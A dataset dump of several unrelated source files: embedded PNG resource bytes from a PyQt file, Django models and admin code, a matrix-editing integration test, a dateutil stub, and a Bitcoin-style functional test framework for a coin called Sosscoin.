\x49\xac\x65\x50\x77\xdd\x19\x54\xf9\xb6\xb0\x23\x20\xa6\x0a\x77\
\x59\x73\x8c\xb7\x63\x02\xe6\xf2\x8c\xf8\xe6\xd9\x7c\xb4\x6a\x1b\
\xa0\xaa\xcf\xe6\xfd\x5f\x4c\xfb\x03\x23\x3c\xa2\xf1\x7b\xe9\x66\
\x94\xdd\xbb\xc2\xfb\xfa\x90\x53\xbe\x0b\x33\x42\x13\x79\x5b\xa5\
\xce\x81\x33\xa9\xde\x91\x73\x86\x01\x85\xa8\xa5\xa7\x0e\xa9\xd3\
\xcf\x91\x98\x94\x48\xfc\x2b\x84\x32\x20\x13\x5b\x54\xcb\xb9\x26\
\xe4\x62\x77\x72\xb0\x84\xb6\x21\x81\x0b\xb0\x0f\xea\xce\x0a\x9c\
\xab\x3d\x8c\x83\xa5\x1b\x49\x1f\x1a\xf4\x18\x3b\xf1\x71\x5e\x2c\
\x65\xcc\x7d\x9b\xa1\x30\x80\x00\x13\x0e\x3b\x68\x92\x63\x0f\xf2\
\x55\x6f\xb9\xbc\x8c\x4e\xc0\x48\xbe\x12\xb3\xc5\x04\xbd\xa9\x87\
\xfe\x74\x7c\x7f\x85\xf4\x33\xd3\x4f\x26\x92\x53\x01\x6b\xc2\xbb\
\xe3\xb7\x63\x72\xe0\x5c\x2a\x48\xaf\xf3\x03\xab\x7f\xd9\x1d\x0c\
\x76\x5b\xc0\xc0\x06\x69\xba\xca\xf1\x67\xd9\x56\x44\x07\xcc\xc6\
\xfb\x13\x7f\x44\x43\x77\x15\x39\xd5\x42\x40\xe6\xce\x4e\x0a\x12\
\xa9\x17\x2f\x56\xde\x74\xe0\x78\x48\xfd\xd0\x6d\xec\x40\xd2\xb8\
\x6d\xdc\x39\xdb\x86\x36\x9d\x9a\xd4\x63\xb6\xce\xe8\x18\x03\x08\
\x30\x28\xe8\xd0\xc9\x2e\xdf\x81\xa3\x65\xe9\x98\x44\x5a\xd8\x91\
\x70\x83\x72\x7c\x32\x65\x44\x2d\x4d\xde\x88\x0e\x7d\x0b\x7f\x36\
\x76\x57\x93\x1e\x62\x90\x9e\x50\x8c\x29\x41\x2f\xf3\x54\x9d\x15\
\xf1\x16\x02\xe5\x4f\xc1\x57\x16\x4e\x76\xcd\xd6\x19\x87\x86\xc3\
\xfb\x00\x4b\xc9\x40\xc5\x08\x7c\x10\xbd\x0b\x32\x5a\x39\xc3\x3d\
\xad\x86\x52\xac\x8d\xde\x95\xa4\x83\xde\xf4\x62\xe9\x99\xa6\x5a\
\x42\xf6\x2d\x94\x8e\xe1\x14\xb5\x9d\xbc\xff\x78\xc5\x2f\x38\x7c\
\x2b\xd5\xa1\x16\x1c\x12\x60\x60\x9a\x60\xfb\x19\xa6\x7c\x86\x6f\
\x49\xa8\x32\x8a\x22\xe4\x4e\xd5\xae\x03\x55\xed\xd7\xb9\xda\xcb\
\x5a\x55\xbc\xd2\x31\x8d\x84\xb9\x8d\xc5\x2a\xba\xc0\xf4\x21\xb7\
\x92\x48\x94\xa6\xda\x89\xd6\x16\x0f\x24\xd0\x07\x46\xc4\x48\x67\
\x05\x3b\x9c\xd8\xe5\x82\x09\x50\x48\x25\x5a\x2c\x94\xda\x89\x8d\
\x9d\x1d\xcb\xa2\x36\xf1\x4c\xe9\x43\x2e\x45\x22\x73\x88\x48\x88\
\xe2\x96\x46\xac\xb7\xb6\x1d\x42\x28\x10\x91\x23\x09\x1d\x50\xce\
\xbc\xb8\xb0\x27\xab\x1b\xac\xdf\x16\xec\xb6\x93\x5f\xbd\x0f\x41\
\x8a\x51\xbc\x2c\x33\x0c\xf7\x18\x0f\x29\x15\xb7\x42\xcd\x49\xbb\
\xdb\x10\xc3\xa0\x22\x7c\x54\xf8\xba\x84\xd2\x01\xf4\x1e\xae\xa8\
\x8f\x5b\x7b\x80\xe7\xc3\x96\x22\x2e\x64\x01\x4f\x63\x5b\x3c\x16\
\x02\x0c\xec\x94\xdc\x5e\xb8\x8a\x8e\xe1\xfb\x24\x58\xc6\xb0\x3b\
\x87\x2d\x1e\x7a\x0b\xfe\x0d\x58\xe5\x3c\x53\x73\x90\xce\x18\x31\
\xdd\x8e\x3b\x91\x51\xf2\x25\xbf\x63\xd8\x96\xe7\x87\x16\xe1\xa3\
\x40\x6b\xec\xe2\x19\xc2\x8a\x58\xdf\x55\xbe\x0f\x8f\x6d\x0b\x6c\
\xc1\x84\xc7\xfe\x5f\xe8\xef\x9c\xe1\x3f\x21\xe0\x08\x4f\x98\x00\
\xf0\x37\xdb\xdc\x8b\x3f\xd8\x8c\xa4\x06\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x04\x96\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x04\x5d\x49\x44\x41\x54\x78\x5e\xed\x97\x5f\x88\x55\x55\
\x14\xc6\x7f\x6b\xef\x7d\x47\x9d\xc1\xcc\xd1\xb9\x33\x93\x9a\xe3\
\x9f\x34\xd1\xd1\x19\x15\x8d\xb0\x12\x91\x0c\xc2\x4a\x2b\x28\x11\
\xa2\x1e\x22\xc2\xa7\x1e\x8c\xe8\xb1\xb7\x88\x20\x21\x31\xc9\x7a\
\x8b\xa0\x88\xd4\x1e\xb2\xe9\x41\x24\x82\x5e\x52\x47\xa3\x8c\x8c\
\x89\xc4\x74\x66\x9a\xa1\x87\x2c\xbd\xf7\xec\xd5\x71\xb5\x71\x33\
\xdd\x49\x88\x31\x7d\xf1\x83\x7d\xd6\x3d\xeb\xae\xb3\xbe\x6f\xef\
\xb5\xf6\xf9\x23\xaa\xca\x8d\x84\xe3\x06\xe3\xa6\x00\x01\xc2\x37\
\xef\x3c\xf1\x85\xa3\xb6\x16\x8d\xf0\x7f\xf7\x84\x08\x88\x23\x52\
\xf9\x6a\xe9\x33\xef\xaf\x0b\x40\xf3\x65\xf2\xae\x6d\xef\x42\x2c\
\x30\x68\x44\x55\x91\xa4\x71\x62\x50\x14\x90\x44\x6c\x70\x9e\x81\
\xf7\x9e\x5e\x0b\x34\x07\x60\x12\x36\xf3\x82\xef\x3e\xd9\x69\x41\
\x33\x97\xdd\x0d\x51\x93\x5a\x99\x20\xbf\xda\xc0\x09\xc3\x27\xbf\
\x04\x8d\xdc\xb9\xf9\x55\xb3\xc0\xa4\x00\x08\x16\x04\xe2\x02\x4e\
\x3c\xde\x4d\x06\x07\x43\x27\x8e\x20\xfc\x47\x01\xd2\x28\x60\x66\
\xf7\xbd\x00\x78\x57\x21\x6a\x01\x9a\x84\x81\x84\x1c\x18\x69\xeb\
\x5e\x6f\x02\x10\x61\xe8\xf8\x61\xaa\x2b\x36\x80\x02\x92\x33\x83\
\x72\x35\x38\x51\x9c\xa4\x70\x85\x88\x30\x78\xec\x30\x33\x97\xaf\
\xb7\xfc\x26\x40\x23\x09\x24\x01\x8a\x6a\x44\x10\x10\xcf\x70\xbf\
\x91\x9b\x0f\x11\xc4\x55\x72\x29\xd4\x62\x01\x45\xc4\x99\x1f\x05\
\xa3\xd2\x82\xe1\x51\xa5\xff\x34\xd4\x0a\xa8\x04\x58\xbe\x00\xda\
\x7b\x36\x30\x58\x4e\x68\x46\x29\x40\x34\x92\xae\x6f\xd8\x86\x46\
\xf4\xeb\xc9\x23\x54\x7b\x36\x82\x0a\xe0\xcc\x77\x7a\xef\x4e\x7e\
\x7c\xfb\x25\x46\x3f\xdf\xcb\x48\xdf\x5b\x8c\x7e\xb6\x07\x17\x26\
\x97\xfe\x17\x19\x2d\xcf\x47\xfa\xf6\x30\x72\x68\x37\xde\x07\x8e\
\x9f\x56\x3a\x67\xc0\xba\x6e\x47\x67\x2b\xf4\xff\x10\x71\x22\xb4\
\xad\xd8\x68\xb9\x6d\x32\x19\x04\x32\x10\x09\x08\x1e\xf0\xa8\xa4\
\xe6\x51\x61\xe1\xf3\x6f\xe0\xc2\x24\x54\x04\x62\x5a\x01\x55\xee\
\xd8\xb1\x1b\x44\xd0\x18\x21\xd6\x40\x6b\xd4\xea\xca\x9c\xce\x26\
\x5a\xa7\x0a\xea\x94\x9f\xce\x5f\x04\xb1\x9c\x08\xde\x38\x1a\x04\
\x68\x3a\x88\x0f\x88\x73\x88\xf3\x08\x49\x80\x08\x02\x7c\xbf\xeb\
\x39\xc4\x7b\xa6\xcf\xed\x42\x55\xc9\xcd\xa1\x68\x51\xd0\xf6\xe0\
\x0b\x76\x6d\xc5\xc3\x99\xf3\x05\x4e\x2a\x9c\x39\x57\xb7\x73\x11\
\x8f\x0d\xe7\x8c\xc3\x52\x37\xae\x80\x5a\x50\x1e\x89\x04\x20\xc2\
\xa2\x1d\x6f\x5a\xcd\x35\xa9\xcd\xfc\x80\x46\x88\x75\x14\x47\xef\
\xe2\x29\x1c\x3d\xf5\x07\x03\x67\x6b\x54\x82\xb0\x66\x59\xb3\xf9\
\x85\x9c\x1b\x74\xdc\x12\xa4\x00\xd7\x20\xc0\x89\xe0\xf2\x5d\x12\
\x4d\x56\x10\x20\xf9\xd2\xaa\x75\xb6\x05\x6e\xab\x4e\xb1\x18\x55\
\x88\x51\x89\x2a\x88\xcb\xb9\xaf\xde\x03\x22\x63\x04\x48\x12\xf0\
\x61\xdf\x39\x16\xce\x69\x4e\x13\x56\x56\x2f\xbd\x95\x0f\xfa\x7e\
\x61\xc1\x6c\xf3\x65\xa4\xff\x57\x2e\x99\x46\x4c\x22\x72\x4e\x19\
\xb7\x07\x32\x4c\x9d\x33\x4b\x12\x60\x47\xe0\xb1\xfb\x67\xe5\xf9\
\x2a\x44\x85\xc7\x4b\x5f\x82\x11\x69\xfe\x8d\x91\x03\x08\xa8\x11\
\xe7\xdc\xe3\x0a\x50\xd4\xd4\x35\x96\x20\x1d\x63\x26\x10\x01\xe7\
\xb0\x06\xf3\xce\xfc\xd4\xea\x50\xa4\x18\x49\x31\x2a\x24\x87\x90\
\xcb\x1b\xd0\x7f\xed\x01\xef\x1b\x77\xc1\x58\x20\x80\xf7\x50\xaf\
\x2b\xbb\x0e\x2a\x27\x06\x60\x6a\x33\xbc\xb2\x5d\x98\x71\x8b\x10\
\x23\x68\x5e\x11\x3b\x8f\x2a\x70\x65\x17\x5c\xb5\x07\x7c\x43\x0f\
\xfc\x13\x4e\xa0\x29\xc0\xce\x7d\x35\x36\xad\xf2\xdc\xd7\x0d\xfb\
\x0e\x15\xbc\xf6\x11\x74\x55\xe1\xb7\xdf\x23\xd5\xe9\x8e\x98\xf4\
\xb7\x95\xa2\x36\xad\xf6\x68\xce\x3d\xbe\x00\x8b\xc6\x03\x02\x2e\
\x20\x80\xc6\x48\x03\x1c\x9c\x3a\x1b\x69\x6f\x75\x6c\xb9\xa7\x89\
\x07\x5e\xbe\xc0\x92\xdb\x1d\xf3\x3a\x84\x9e\x79\x81\x6f\x7f\x2e\
\xe8\x9d\xef\x89\x8a\x8d\xf9\xa5\x1f\x09\x20\x29\x37\x1e\xf4\x9f\
\x25\xd0\xbc\xbc\x6d\xbd\x8f\x30\x78\x6c\x3f\xd5\x9e\x87\x50\x29\
\xd2\x96\xcb\x10\x81\x8e\xe9\x9e\xa7\x36\x06\x2e\x5e\x12\x5e\x7f\
\xb6\x85\xc5\xb3\x1c\xf5\x88\xc5\xae\x5e\x54\x49\x25\x48\x03\x41\
\xf1\x0c\x1d\x3b\x40\xb5\xcc\xad\x5a\x90\x39\x21\x40\xee\x1a\xe7\
\x9b\x00\x68\x5f\xf9\x28\x83\x47\x3f\x2e\x2f\x78\x78\xdc\x3e\x68\
\x69\x2e\x47\x0b\xd4\x14\xe6\x76\xc0\x9f\x45\x22\x23\x03\x49\x03\
\x61\xe8\xe8\x01\xcb\x69\x72\xf0\xc6\x85\x64\x01\x58\xac\x73\x0c\
\xf7\x7f\x8a\x3d\x96\x7b\x36\x97\x22\xb6\x32\xf8\xf5\x7e\xab\xdb\
\x44\xa0\xaa\x25\xf9\x16\x80\x72\x15\x0e\x82\x38\x3a\xee\xda\x8e\
\xe4\x12\x64\xb9\xce\x05\x54\x23\x22\x66\x69\x5f\xb5\x15\x98\xc0\
\x5b\x91\x2a\xa0\x26\xc2\xb6\xa0\x0b\x66\x13\x5f\x16\x80\xf3\x88\
\x6f\xa2\xba\xe6\x49\x50\xb5\x3a\x89\x2a\xd7\x0a\x62\x07\xa1\x7d\
\xcd\x36\xb3\x25\x97\x71\x26\x01\xe8\xc5\xc2\x9d\x29\x5f\x12\x67\
\x13\x0b\x4c\x31\x66\xae\x2d\x52\xd9\x41\x8c\xfc\x32\x27\xa0\x02\
\x4c\x03\xba\x80\xd6\xeb\xf8\x9d\x10\x81\x11\x60\x20\x00\x17\x80\
\x01\xe0\x2c\x20\x5c\x1f\x28\x70\xc9\xb8\x6f\x34\x6e\x7e\x1d\xff\
\x05\x99\x91\xdf\x52\x52\xa7\x93\x17\x00\x00\x00\x00\x49\x45\x4e\
\x44\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x06\
\x07\x9c\xa3\xfd\
\x00\x73\
\x00\x65\x00\x73\x00\x6d\x00\x69\x00\x6d\
\x00\x09\
\x06\x76\x82\x67\
\x00\x63\
\x00\x72\x00\x6f\x00\x70\x00\x73\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x09\xa9\x84\xc7\
\x00\x63\
\x00\x65\x00\x72\x00\x74\x00\x66\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\
\x00\x00\x00\x26\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x06\xab\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| [
"aagii_csms@yahoo.com"
] | aagii_csms@yahoo.com |
1fa4211910a147f06100b61c294ba7cdcfedf97e | 91d45f1a41e092ee2ed992c8b1f7f24b0c12ac4a | /DIM/coursework/rct/models.py | fc77802354bd147008cb6f385e2bddc199484018 | [] | no_license | MatthewPaterson/DIM3 | 94d7c4a9a3d0cdd67ec57f76e8c83f4730a8d376 | 7bf8c42d17add5e56a4342b2fb408ce2bdf98c4f | refs/heads/master | 2021-01-01T16:55:28.357095 | 2014-02-04T09:01:10 | 2014-02-04T09:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | from django.db import models
class Category(models.Model):
name = models.CharField(max_length=128, unique=True)
def __unicode__(self):
return self.name
class Page(models.Model):
category = models.ForeignKey(Category)
title = models.CharField(max_length=128)
url = models.URLField()
views = models.IntegerField(default=0)
def __unicode__(self):
return self.title
| [
"matty.mep@gmail.com"
] | matty.mep@gmail.com |
a3a07052f03a7dc28d6f2c41f80889cbc46bc905 | 32c6590127686114bfacff11fa7cd646025d3819 | /test_project/test_app/models.py | e45ce8711f5854e739457ed3382e0356433d6b1c | [
"BSD-2-Clause"
] | permissive | revsys/django-test-plus | 42cc6cddde30f561bec91294d2e85c21cbc62887 | 9cfb0c865b1dcad1ca6c9c4717d67ea8d476269c | refs/heads/main | 2023-08-29T03:52:59.089300 | 2023-07-11T11:37:47 | 2023-07-11T11:37:47 | 36,131,033 | 618 | 75 | BSD-3-Clause | 2023-07-11T11:35:24 | 2015-05-23T16:08:52 | Python | UTF-8 | Python | false | false | 154 | py | from django.db import models
class Data(models.Model):
""" Simple model to test our query assertions """
name = models.CharField(max_length=50)
| [
"frank@revsys.com"
] | frank@revsys.com |
44b8b51883b7aebaf72aacdb0dab83ffcaaf63fd | 0e62ab1b733a60ec4c41e9a7a4c667b53be02964 | /functional_tests/integ_tests.py | e7ea53c275716de573bb69f22ff784ecf3f1dce7 | [] | no_license | julianaskubs/Python-Arrays | 3e3822dd3b63a688c7078e45044fc2452f96e554 | 741703c26a64e965444a3a0add5c355061a3888e | refs/heads/master | 2020-12-22T17:35:51.432223 | 2016-08-15T21:17:18 | 2016-08-15T21:17:18 | 65,694,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,046 | py | from main.matrix import RunProgram as RP
import unittest
class MatrixIntegTest(unittest.TestCase):
def test_steps_one(self):
cmd = "I 5 6"
matrix = RP(prompt=False, cmd=cmd)
cmd = "L 2 3 A"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "S one.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
matrix_eg = [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 'A', 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
self.assertEquals(matrix.matrix, matrix_eg)
def test_steps_two(self):
matrix = [[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 'A', 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
cmd = "G 2 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "V 2 3 4 W"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "H 3 4 2 Z"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "F 3 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix)
cmd = "S two.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix)
matrix_eg = [['J', 'J', 'J', 'J', 'J'],
['J', 'J', 'Z', 'Z', 'J'],
['J', 'W', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J']]
self.assertEquals(matrix, matrix_eg)
def test_steps_three(self):
cmd = "I 10 9"
matrix = RP(prompt=False, cmd=cmd)
cmd = "L 5 3 A"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "G 2 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "V 2 3 4 W"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "H 1 10 5 Z"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "F 3 3 J"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "K 2 7 8 8 E"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "F 9 9 R"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
cmd = "S one.bmp"
RP(prompt=False, cmd=cmd, matrix=matrix.matrix)
matrix_eg = \
[['J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'A', 'J', 'J', 'J', 'J', 'J'],
['J', 'W', 'J', 'J', 'J', 'J', 'J', 'J', 'J', 'J'],
['Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z', 'Z'],
['R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R'],
['R', 'E', 'E', 'E', 'E', 'E', 'E', 'E', 'R', 'R'],
['R', 'E', 'E', 'E', 'E', 'E', 'E', 'E', 'R', 'R'],
['R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R', 'R']]
self.assertEquals(matrix.matrix, matrix_eg)
if __name__ == '__main__':
unittest.main()
| [
"julianaskubs@gmail.com"
] | julianaskubs@gmail.com |
053f64e6385d70d8e49c045ff44d38e56873a99a | d4a569dcf616b7f05e53a44803e38196b436b8b9 | /Thesis@3.9.1/Lib/site-packages/mypy/typeshed/third_party/2and3/dateutil/utils.pyi | 3eefd2e48ba5311cbdb709991a6815cdd94459e1 | [
"MIT"
] | permissive | nverbois/TFE21-232 | ac3178d24939c872c02a671c0f1d8cc471af516b | 7113837b5263b5c508bfc6903cb6982b48aa7ee4 | refs/heads/main | 2023-06-05T18:50:59.207392 | 2021-06-25T19:54:40 | 2021-06-25T19:54:40 | 337,691,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | pyi | from typing import Optional
from datetime import datetime, tzinfo, timedelta
def default_tzinfo(dt: datetime, tzinfo: tzinfo) -> datetime: ...
def today(tzinfo: Optional[tzinfo] = ...) -> datetime: ...
def within_delta(dt1: datetime, dt2: datetime, delta: timedelta) -> bool: ...
| [
"38432529+nverbois@users.noreply.github.com"
] | 38432529+nverbois@users.noreply.github.com |
4e65987083f85dd67d34e904f53f16c42343b409 | b192e89439bcb698a2c36d8fef77ed296efa6e92 | /src/dataStorage/admin.py | f113c2f3df91a438c492e1c95253047d7b5d7648 | [] | no_license | rshnGhost/mTSA | 091950f3f4e77b03add97135cbaf6f91acded683 | 269ce5d69c025a095df63fd4c891c4422ce4c1f1 | refs/heads/master | 2023-06-30T11:16:29.650723 | 2021-08-11T08:31:59 | 2021-08-11T08:31:59 | 290,937,283 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import phoneData
from .models import phoneImg
from .models import phoneBench
from .models import PosTweet, NegTweet, NeuTweet
from .models import cache, phoneWeb, antutu
class PosTweetInline(admin.TabularInline):#StackedInline
model = PosTweet
extra = 0
class NegTweetInline(admin.TabularInline):#StackedInline
model = NegTweet
extra = 0
class NeuTweetInline(admin.TabularInline):#StackedInline
model = NeuTweet
extra = 0
class phoneDataAdmin(admin.ModelAdmin):
list_display = ["name", "modelNo", "price", "picture"]
list_display_links = ["name"]
list_editable = ["price"]
list_filter = ["name", "modelNo"]
search_fields = ["modelNo", "name"]
class Meta:
model = phoneData
class phoneBenchAdmin(admin.ModelAdmin):
list_display = ["device", "pt", "nt", "net", "cpu", "gpu", "mem", "ux", "total" ]
list_display_links = ["device"]
#list_editable = ["pt", "net", "nt"]
list_filter = ["device", "total"]
search_fields = ["modelNo"]
inlines = [PosTweetInline, NegTweetInline, NeuTweetInline]
class Meta:
model = phoneBench
class cacheAdmin(admin.ModelAdmin):
list_display = ["name", "tag", "satuts" ]
list_display_links = ["name"]
list_editable = ["satuts"]
list_filter = ["name", "satuts"]
class Meta:
model = cache
# Register your models here.
admin.site.register(phoneData, phoneDataAdmin)
admin.site.register(phoneImg)
admin.site.register(antutu)
admin.site.register(PosTweet)
admin.site.register(NegTweet)
admin.site.register(NeuTweet)
admin.site.register(phoneWeb)
admin.site.register(cache, cacheAdmin)
admin.site.register(phoneBench, phoneBenchAdmin)
| [
"31742263+rshnGhost@users.noreply.github.com"
] | 31742263+rshnGhost@users.noreply.github.com |
649a77c31f62e5ca93fedfcab0d01dffe100e65d | 30231faf0439d40263ea033aa6692d50d995dcdf | /test/functional/test_framework/test_framework.py | afc326a6746f48448f0dbba2366c41c3f12f8cf0 | [
"MIT"
] | permissive | zuka2512/Sosscoin | c6f59fb07ce3c88839f124b273c9bfc2fa1ffe26 | 8e81695c4606405fbf3ba41ab2bb56cd09bd631e | refs/heads/master | 2020-06-04T09:37:12.821794 | 2019-06-14T15:55:36 | 2019-06-14T15:55:36 | 191,967,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,225 | py | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
from enum import Enum
import logging
import optparse
import os
import pdb
import shutil
import sys
import tempfile
import time
import traceback
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
initialize_datadir,
log_filename,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class BitcoinTestFramework(object):
"""Base class for a sosscoin test script.
Individual sosscoin test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.mocktime = 0
self.set_test_params()
assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave sosscoinds and test.* datadir on exit or error")
parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop sosscoinds after the test execution")
parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../src"),
help="Source directory containing sosscoind/sosscoin-cli (default: %default)")
parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs")
parser.add_option("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_option("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_option("--configfile", dest="configfile",
help="Location of the test framework config file")
parser.add_option("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
self.add_options(parser)
(self.options, self.args) = parser.parse_args()
PortSeed.n = self.options.port_seed
os.environ['PATH'] = self.options.srcdir + ":" + self.options.srcdir + "/qt:" + os.environ['PATH']
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
success = TestStatus.FAILED
try:
self.setup_chain()
self.setup_network()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException as e:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: %s" % e.message)
success = TestStatus.SKIPPED
except AssertionError as e:
self.log.exception("Assertion failed")
except KeyError as e:
self.log.exception("Key error")
except Exception as e:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt as e:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
self.log.info("Note: sosscoinds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up")
shutil.rmtree(self.options.tmpdir)
else:
self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
if os.getenv("PYTHON_DEBUG", ""):
# Dump the end of the debug logs, to aid in debugging rare
# travis failures.
import glob
filenames = [self.options.tmpdir + "/test_framework.log"]
filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
MAX_LINES_TO_PRINT = 1000
for fn in filenames:
try:
with open(fn, 'r') as f:
print("From", fn, ":")
print("".join(deque(f, MAX_LINES_TO_PRINT)))
except OSError:
print("Opening file %s failed." % fn)
traceback.print_exc()
if success == TestStatus.PASSED:
self.log.info("Tests successful")
sys.exit(TEST_EXIT_PASSED)
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
sys.exit(TEST_EXIT_SKIPPED)
else:
self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
logging.shutdown()
sys.exit(TEST_EXIT_FAILED)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes, i, i + 1)
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test scripts.
